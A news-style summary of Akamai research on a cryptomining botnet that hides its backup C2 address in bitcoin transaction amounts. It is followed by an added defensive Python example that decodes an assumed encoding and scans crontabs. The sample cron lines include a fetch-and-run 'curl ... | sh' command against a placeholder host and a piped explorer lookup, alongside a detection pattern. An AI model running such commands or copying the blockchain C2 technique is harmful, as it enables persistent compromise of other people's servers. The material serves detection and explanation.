Akamai Describes How This Strategy Works
A cryptomining botnet campaign is using bitcoin blockchain transactions to hide command-and-control server addresses and stay under the radar, defeating takedown attempts, according to security firm Akamai.
By pushing a few blockchain transactions into a cryptocurrency wallet, attackers can recover infected systems that have been orphaned, creating a way to distribute configuration data through a medium that is effectively unseizable and uncensorable, researchers at the security firm say.
Infection Chain
The initial infection begins with the exploitation of remote code execution vulnerabilities in Hadoop YARN, Elasticsearch (CVE-2015-1427) and ThinkPHP (CVE-2019-9082). The payload delivered causes the vulnerable machine to download and execute a malicious shell script.
“In older campaigns, the shell script itself handled the key functions of infection. The stand-alone script disabled security features, killed off competing infections, established persistence, and in some cases, continued infection attempts across networks found within the known hosts files,” the report notes.
But the newer versions of the shell script are written with fewer lines of code and use binary payloads to handle more of the system interactions, such as killing off competitors, disabling security features, modifying SSH keys, downloading malware and starting the miners.
Researchers note that the operators behind the campaign use cron jobs and rootkits for persistence and for distributing updates, ensuring that infected machines regularly check in and are reinfected with the latest version of the malware.
These techniques rely on domains and static IP addresses written into crontabs and configuration files, and those domains and IP addresses routinely get identified and seized, the researchers say. But the operators include a backup infrastructure in which infections can go into failover mode and download an updated infection that will, in turn, update the infected machine to use new domains and infrastructure.
“While this technique works, a coordinated takedown effort that targets domains and failover IP address/infrastructure all at once could effectively cut the operators out of maintaining their foothold on infected systems,” the researchers note.
Use of Bitcoin Wallet
In December 2020, Akamai researchers detected the presence of a bitcoin wallet address in newer variants of this malware, along with a URL for a wallet-checking API and a cryptic series of nested bash one-liners.
The data fetched from the API is used to calculate an IP address, which is then used for persistence and further infection operations, the researchers say.
“This is a very clever and strategic approach. It enables the operators to stash obfuscated configuration data on the blockchain,” according to Akamai. “By pushing a small amount of BTC [bitcoin] into the wallet, they can recover infected systems that have been orphaned. They have essentially devised a method of distributing configuration information in a medium that is effectively unseizable and uncensorable. Using this method, the operators of the campaign have turned potential offensive actions against their infrastructure from a serious disruption into something that can be recovered from quickly and easily.”
Akamai’s security intelligence response team estimates that the operators behind the campaign have mined over $30,000 in monero from unwitting hosts over the past three years.
To convert a bitcoin transaction into an IP address, the script first needs to know which transactions the wallet has sent and received. The cryptominers achieve this by making an HTTP request to a blockchain explorer API (api.blockcypher.com) for the last two transactions of the given wallet address, and then converting the satoshi values of those transactions into the backup C2 IP address, Akamai states.
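The following is an added illustration, not code from Akamai's report or from the malware, of how an analyst can reproduce the lookup described above once a wallet address has been recovered from a sample: pull the amounts of the two most recent transactions out of an explorer response and turn them into the fallback IPv4 address so it can be blocked or watched for, and flag crontab entries that query the explorer's address endpoint. The page only says the satoshi values are "converted" into an IP address; the exact mapping is not given, so the example assumes a simple scheme (each amount is a 16-bit number whose high and low bytes become two octets, most recent transaction first). The wallet string, the JSON response and the cron lines are all constructed, and the decoded address lands in the 192.0.2.0/24 documentation range.

```python
"""Added example (not Akamai's or the campaign's code): decode a "backup C2"
IPv4 address from the satoshi amounts of a wallet's two newest transactions,
and flag cron lines that perform this kind of blockchain-explorer lookup.

ASSUMPTION: the mapping from satoshi amounts to IP octets is not on the page.
This example assumes each amount is a 16-bit number whose high and low bytes
become two octets, newest transaction first.
"""
import ipaddress
import json
import re
from typing import List, Tuple


def satoshis_to_octets(value: int) -> Tuple[int, int]:
    """Split one satoshi amount into (high byte, low byte). Assumed encoding."""
    if not 0 <= value <= 0xFFFF:
        raise ValueError(f"amount {value} does not fit in two octets")
    return value // 256, value % 256


def decode_backup_c2(sat_values: List[int]) -> str:
    """Turn the amounts of the two newest transactions into a dotted IPv4."""
    if len(sat_values) != 2:
        raise ValueError("expected exactly two transaction amounts")
    octets = bytes(o for v in sat_values for o in satoshis_to_octets(v))
    return str(ipaddress.IPv4Address(octets))


# Constructed explorer response, loosely shaped like an address lookup that
# lists transactions with their outputs. NOT captured from api.blockcypher.com.
WALLET = "bc1qexamplewalletplaceholder000000000000000"  # placeholder, not real
SAMPLE_EXPLORER_JSON = json.dumps({
    "address": WALLET,
    "txs": [  # newest first, as explorers usually return them
        {"hash": "txhash-newest", "outputs": [{"addresses": [WALLET], "value": 49152}]},
        {"hash": "txhash-second", "outputs": [{"addresses": [WALLET], "value": 522}]},
        {"hash": "txhash-older", "outputs": [{"addresses": [WALLET], "value": 1234}]},
    ],
})


def last_two_incoming_values(api_json: str, wallet: str) -> List[int]:
    """Collect the amounts paid *to* the wallet in its two newest transactions."""
    doc = json.loads(api_json)
    values: List[int] = []
    for tx in doc["txs"]:
        for out in tx["outputs"]:
            if wallet in out.get("addresses", []):
                values.append(int(out["value"]))
                break  # one amount per transaction
        if len(values) == 2:
            break
    return values


# Defender side: spot crontab/shell lines that fetch wallet data from the
# explorer named in the article. Sample cron lines below are constructed.
EXPLORER_LOOKUP = re.compile(r"api\.blockcypher\.com/v1/btc/\S*addrs/\S+", re.IGNORECASE)

SAMPLE_CRON_LINES = [
    "*/10 * * * * /usr/bin/curl -fsSL http://cdn.example.invalid/update.sh | sh",
    "*/30 * * * * curl -s https://api.blockcypher.com/v1/btc/main/addrs/"
    + WALLET + "/full | /tmp/.x/resolve.sh",
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf",
]


def suspicious_explorer_lookups(lines: List[str]) -> List[str]:
    """Return the lines that query a BTC address endpoint on the explorer."""
    return [ln for ln in lines if EXPLORER_LOOKUP.search(ln)]


if __name__ == "__main__":
    amounts = last_two_incoming_values(SAMPLE_EXPLORER_JSON, WALLET)
    print("amounts:", amounts)                               # [49152, 522]
    print("decoded backup C2:", decode_backup_c2(amounts))   # 192.0.2.10
    for ln in suspicious_explorer_lookups(SAMPLE_CRON_LINES):
        print("suspicious cron entry:", ln)
```

The decoder refuses amounts that do not fit in two octets, which is a useful sanity check when the assumed encoding is wrong for a given sample; the cron scan is deliberately narrow (explorer host plus address endpoint) so that it can be dropped into an existing crontab audit without matching ordinary update jobs.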
In the campaign, the remote code execution component has been modified to create a Redis scanning and compromising bot that crafts “a series of commands that are launched against Redis servers with weak passwords. This, in turn, converts the Redis servers into miners and scanners as well,” the researchers note.